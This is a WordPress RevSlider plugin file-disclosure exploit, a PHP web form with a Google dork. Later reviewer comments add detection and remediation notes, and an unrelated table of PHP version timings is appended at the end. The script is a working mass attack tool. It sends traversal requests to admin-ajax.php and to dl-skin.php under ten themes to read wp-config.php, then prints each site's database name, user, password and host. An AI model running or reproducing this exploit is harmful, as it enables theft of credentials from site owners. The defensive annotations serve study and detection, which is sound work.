# Exploit Title: [Wordpress RevSlider Plugin LFD]
# Google Dork: inurl:/admin-ajax.php?action=revslider_show_image
# Date: 12/29/14
# Exploit Author: FarbodEZRaeL
# Vendor Homepage: iranhack.org
# Software Link: wordpress.org
# Tested on: windows
#Exploit:
<html> <head> <title>Exploits Wordpress</title> </head> <body style="background-color: rebeccapurple;"> <pre><p><center style="color: aqua;">
=============================================================
= Exploits Wordpress RevSlider Plugin LFD Vuln =
= =
= Coded by FarbodEZRaeL =
= Iranhack Security team =
= www.iranhack.org =
= Fix bug Other Version =
=============================================================
<pre><href> <form method='POST'> <textarea name='sites' cols='45' rows='0'></textarea> <br> <input type='submit' value='Exploit' /> </form>
<?php
# Coded by FarbodEZRaeL
# Exploits Wordpress RevSlider Plugin LFD Vuln

# NOTE(review): Reader's summary of what this script does. For every
# newline-separated URL posted in the `sites` form field, the loop below
#   (1) fetches the front page and the ?author=1 page to print a WordPress
#       version string and a user name,
#   (2) asks wp-admin/admin-ajax.php for ../wp-config.php through the
#       revslider_show_image action, and
#   (3) posts a traversal path to lib/scripts/dl-skin.php under ten theme
#       directories.
# Any response containing DB_USER is parsed and the four DB_* values printed.
#
# Defender takeaways: none of the requests below sets a cookie or credential,
# so exposure depends only on the affected plugin or theme being installed.
# The fix is to update or remove that component. A site that answered one of
# these requests with file contents returned the whole wp-config.php, not just
# the four values printed here, so database credentials and the keys/salts in
# that file should all be treated as disclosed and rotated.

# Removes the execution time limit and silences all PHP error output.
@set_time_limit(0);
error_reporting(0);

# One target URL per CRLF-separated line of the submitted textarea.
$sites = explode("\r\n", $_POST['sites']);
foreach($sites as $site) {
    $site = trim($site);

    # Request 1: plain GET of the site root, response headers included, used
    # only to look for a "WordPress <version>" string in the returned markup.
    # Hiding that string removes the version from this printout but does not
    # change whether the file-read requests further down succeed.
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, "$site");
    curl_setopt($ch, CURLOPT_HEADER, 1);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)");
    $get = curl_exec($ch);
    curl_close($ch);
    if(preg_match("#WordPress (.*?)/>#", $get, $version)){
        # Strip the trailing "/>" and any double quotes from the match.
        $str = str_replace('/>', "", $version[0]);
        $str = str_replace('"', "", $str);
    }

    # Request 2: fetches /?author=1 and takes the text before the first "|"
    # in the page <title> as the user name. Detection: requests for
    # /?author=<n> from a client that then goes straight to admin-ajax.php.
    $users = @file_get_contents("$site/?author=1");
    preg_match('/<title>;(.*?)<\/title>/si',$users,$user);
    $wpuser = explode('|',$user[1]);
    echo " <br>======================================</br>";
    echo "Site : ".$site."<br> Wp User : ".$wpuser[0]."<br> Version : ".$str."<br>";

    # Request 3: GET to admin-ajax.php with action=revslider_show_image and an
    # img parameter that points one directory up at wp-config.php.
    # Detection: this is visible in web access logs as a GET to
    # /wp-admin/admin-ajax.php whose query string has
    # action=revslider_show_image and an img value containing "../" or naming
    # a non-image file. The hard-coded MSIE user-agent strings in this script
    # are a weak signal only.
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, "$site/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php");
    curl_setopt($ch, CURLOPT_HTTPGET, 1);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
    # The line break inside the next string literal is present in the page as
    # captured and is left untouched.
    curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 5.01; Windows 
NT 5.0)");
    $xp = curl_exec ($ch);
    curl_close($ch);

    # A response that contains DB_USER is taken to be wp-config.php; the four
    # define() values are pulled out with regexes and echoed.
    if(preg_match("#DB_USER#i",$xp)){
        preg_match("#'DB_NAME', '(.*?)'#i",$xp,$DB_NAME);
        echo "DB_NAME:{$DB_NAME[1]}<br>";
        preg_match("#'DB_USER', '(.*?)'#i",$xp,$DB_USER);
        echo "DB_USER:{$DB_USER[1]}<br>";
        preg_match("#'DB_PASSWORD', '(.*?)'#i",$xp,$DB_PASSWORD);
        echo "DB_PASSWORD:{$DB_PASSWORD[1]}<br>";
        preg_match("#'DB_HOST', '(.*?)'#i",$xp,$DB_HOST);
        echo "DB_HOST:{$DB_HOST[1]}<br>";
    }

    # Theme paths probed next: the same lib/scripts/dl-skin.php file under ten
    # theme directories. An inventory check for any of these directories under
    # wp-content/themes/ tells a site owner whether this part applies to them.
    $lt = array("wp-content/themes/construct/lib/scripts/dl-skin.php",
        "wp-content/themes/persuasion/lib/scripts/dl-skin.php",
        "wp-content/themes/manbiz2/lib/scripts/dl-skin.php",
        "wp-content/themes/method/lib/scripts/dl-skin.php",
        "wp-content/themes/elegance/lib/scripts/dl-skin.php",
        "wp-content/themes/modular/lib/scripts/dl-skin.php",
        "wp-content/themes/myriad/lib/scripts/dl-skin.php",
        "wp-content/themes/echelon/lib/scripts/dl-skin.php",
        "wp-content/themes/fusion/lib/scripts/dl-skin.php",
        "wp-content/themes/awake/lib/scripts/dl-skin.php");
    foreach($lt as $l){
        # Request 4: POST to dl-skin.php with _mysite_download_skin set to a
        # five-level traversal ending at wp-config.php; redirects are followed
        # and the request times out after 30 seconds.
        # Detection: POSTs to .../lib/scripts/dl-skin.php under
        # wp-content/themes/. The traversal value travels in the POST body,
        # which access logs usually do not record, so match on the path or
        # inspect request bodies at a WAF / reverse proxy.
        $site = "$site/$l";
        $process = curl_init($site);
        curl_setopt($process, CURLOPT_TIMEOUT, 30);
        curl_setopt($process, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)");
        curl_setopt($process, CURLOPT_HEADER, TRUE);
        curl_setopt($process, CURLOPT_POST, 1);
        curl_setopt($process, CURLOPT_POSTFIELDS, "_mysite_download_skin=../../../../../wp-config.php");
        curl_setopt($process, CURLOPT_RETURNTRANSFER, 1);
        curl_setopt($process, CURLOPT_FOLLOWLOCATION, 1);
        $return = curl_exec($process);

        # Same DB_USER test and DB_* extraction as for the admin-ajax.php
        # response above, applied to the dl-skin.php response.
        if(preg_match("#DB_USER#i",$return)){
            preg_match("#'DB_NAME', '(.*?)'#i",$return,$DB_NAME);
            echo "DB_NAME:{$DB_NAME[1]}<br>";
            preg_match("#'DB_USER', '(.*?)'#i",$return,$DB_USER);
            echo "DB_USER:{$DB_USER[1]}<br>";
            preg_match("#'DB_PASSWORD', '(.*?)'#i",$return,$DB_PASSWORD);
            echo "DB_PASSWORD:{$DB_PASSWORD[1]}<br>";
            preg_match("#'DB_HOST', '(.*?)'#i",$return,$DB_HOST);
            echo "DB_HOST:{$DB_HOST[1]}<br>";
            break;
            echo " <br>-----------------------------------</br>";
            ob_implicit_flush(true);
            ob_end_flush();
        }
    }
}
?> </pre></p></center>

Here you find the average performance (time & memory) of each version. A grayed out version indicates it didn't complete successfully (based on exit-code).

VersionSystem time (s)User time (s)Memory (MiB)
8.3.60.0190.00316.88
8.3.50.0170.00716.60
8.3.40.0140.00718.88
8.3.30.0150.00018.70
8.3.20.0030.00520.16
8.3.10.0080.00021.86
8.3.00.0080.00021.93
8.2.180.0150.00418.29
8.2.170.0040.01222.96
8.2.160.0140.00319.04
8.2.150.0080.00024.18
8.2.140.0050.00324.66
8.2.130.0060.00319.44
8.2.120.0000.00726.35
8.2.110.0030.00620.77
8.2.100.0040.00718.28
8.2.90.0040.00419.43
8.2.80.0080.00018.18
8.2.70.0030.00617.75
8.2.60.0060.00318.05
8.2.50.0050.00318.10
8.2.40.0000.00820.80
8.2.30.0000.00920.98
8.2.20.0000.00818.17
8.2.10.0050.00318.23
8.2.00.0000.00718.16
8.1.280.0100.00725.92
8.1.270.0040.00423.93
8.1.260.0040.00426.35
8.1.250.0040.00428.09
8.1.240.0060.00323.79
8.1.230.0080.00319.21
8.1.220.0040.00417.74
8.1.210.0080.00018.77
8.1.200.0040.00417.47
8.1.190.0030.00617.48
8.1.180.0030.00518.10
8.1.170.0040.00419.15
8.1.160.0070.00019.15
8.1.150.0040.00420.67
8.1.140.0000.00719.56
8.1.130.0040.00418.90
8.1.120.0040.00417.60
8.1.110.0040.00417.51
8.1.100.0030.00617.47
8.1.90.0000.00717.53
8.1.80.0000.00817.55
8.1.70.0030.00517.56
8.1.60.0030.00617.57
8.1.50.0040.00417.54
8.1.40.0000.00817.57
8.1.30.0040.00417.69
8.1.20.0060.00717.73
8.1.10.0000.00817.75
8.1.00.0040.00417.50
8.0.300.0040.00418.77
8.0.290.0090.00016.88
8.0.280.0040.00418.49
8.0.270.0080.00017.36
8.0.260.0050.00317.03
8.0.250.0030.00317.13
8.0.240.0000.00717.08
8.0.230.0040.00417.15
8.0.220.0080.00017.07
8.0.210.0070.00017.07
8.0.200.0070.00016.99
8.0.190.0040.00417.01
8.0.180.0040.00417.07
8.0.170.0040.00417.14
8.0.160.0040.00417.08
8.0.150.0050.00217.03
8.0.140.0040.00416.98
8.0.130.0030.00313.53
8.0.120.0050.00217.03
8.0.110.0040.00416.93
8.0.100.0030.00616.89
8.0.90.0040.00417.10
8.0.80.0070.01117.05
8.0.70.0030.00516.95
8.0.60.0040.00417.04
8.0.50.0040.00417.01
8.0.30.0090.01017.21
8.0.20.0160.00317.40
8.0.10.0030.00517.23
8.0.00.0100.00916.85
7.4.330.0030.00315.55
7.4.320.0030.00316.76
7.4.300.0000.00616.72
7.4.290.0110.00016.51
7.4.280.0030.00616.55
7.4.270.0070.00016.58
7.4.260.0000.00816.67
7.4.250.0030.00316.57
7.4.240.0020.00516.62
7.4.230.0000.00716.71
7.4.220.0070.01016.63
7.4.210.0050.01016.66
7.4.200.0030.00316.63
7.4.160.0050.01316.67
7.4.150.0140.00417.40
7.4.140.0100.01017.86
7.4.130.0060.01316.64
7.4.120.0080.01216.57
7.4.110.0090.00816.58
7.4.100.0160.00016.70
7.4.90.0000.01716.73
7.4.80.0090.00919.39
7.4.70.0000.01516.50
7.4.60.0160.00316.69
7.4.50.0070.01116.42
7.4.40.0070.01016.73
7.4.30.0130.00816.62
7.4.00.0070.01015.04
7.3.330.0000.00613.23
7.3.320.0000.00513.23
7.3.310.0040.00416.44
7.3.300.0040.00416.48
7.3.290.0000.00716.44
7.3.280.0090.00816.49
7.3.270.0100.01017.40
7.3.260.0110.01116.51
7.3.250.0110.00816.56
7.3.240.0060.01616.58
7.3.230.0090.00916.64
7.3.210.0100.00716.50
7.3.200.0100.01016.61
7.3.190.0100.00716.57
7.3.180.0070.01016.53
7.3.170.0090.00916.77
7.3.160.0110.00516.75
7.3.120.0100.00714.93
7.3.110.0070.01114.98
7.3.100.0040.01515.21
7.3.90.0060.01214.97
7.3.80.0110.00415.02
7.3.70.0060.00914.73
7.3.60.0120.00314.79
7.3.50.0030.00914.82
7.3.40.0030.00915.02
7.3.30.0090.00915.04
7.3.20.0080.00316.66
7.3.10.0000.01016.63
7.3.00.0000.01016.71
7.2.330.0060.01216.76
7.2.320.0170.00716.87
7.2.310.0070.01016.73
7.2.300.0100.00716.51
7.2.290.0090.01316.92
7.2.250.0090.00915.09
7.2.240.0100.01015.02
7.2.230.0030.01315.20
7.2.220.0080.00815.35
7.2.210.0030.01315.03
7.2.200.0070.00715.29
7.2.190.0030.01014.98
7.2.180.0070.00315.16
7.2.170.0000.01314.96
7.2.110.0250.00616.71
7.2.60.0070.01016.86
7.2.00.0060.00619.59
7.1.330.0030.00916.09
7.1.320.0070.00315.96
7.1.310.0100.00615.97
7.1.300.0070.00715.54
7.1.290.0090.00915.92
7.1.280.0060.00615.91
7.1.270.0070.00315.64
7.1.260.0110.00315.99
7.1.200.0070.00715.79
7.1.100.0030.01218.37
7.1.70.0060.00617.25
7.1.60.0160.00934.81
7.1.50.0170.01034.96
7.1.40.0160.01034.46
7.1.30.0170.01034.55
7.1.20.0130.01334.57
7.1.10.0000.01516.36
7.1.00.0000.01216.62
7.0.200.0060.00616.86
7.0.190.0000.01216.41
7.0.180.0030.00916.13
7.0.170.0080.00416.41
7.0.160.0030.00916.37
7.0.150.0050.00916.08
7.0.140.0030.00916.38
7.0.130.0030.01016.44
7.0.120.0060.00616.42
7.0.110.0030.01116.43
7.0.100.0040.01116.25
7.0.90.0070.00716.41
7.0.80.0070.00716.41
7.0.70.0000.01616.14
7.0.60.0030.01216.25
7.0.50.0090.00316.57
7.0.40.0000.01216.54
7.0.30.0040.00816.75
7.0.20.0000.01216.50
7.0.10.0090.00316.64
7.0.00.0040.00816.54
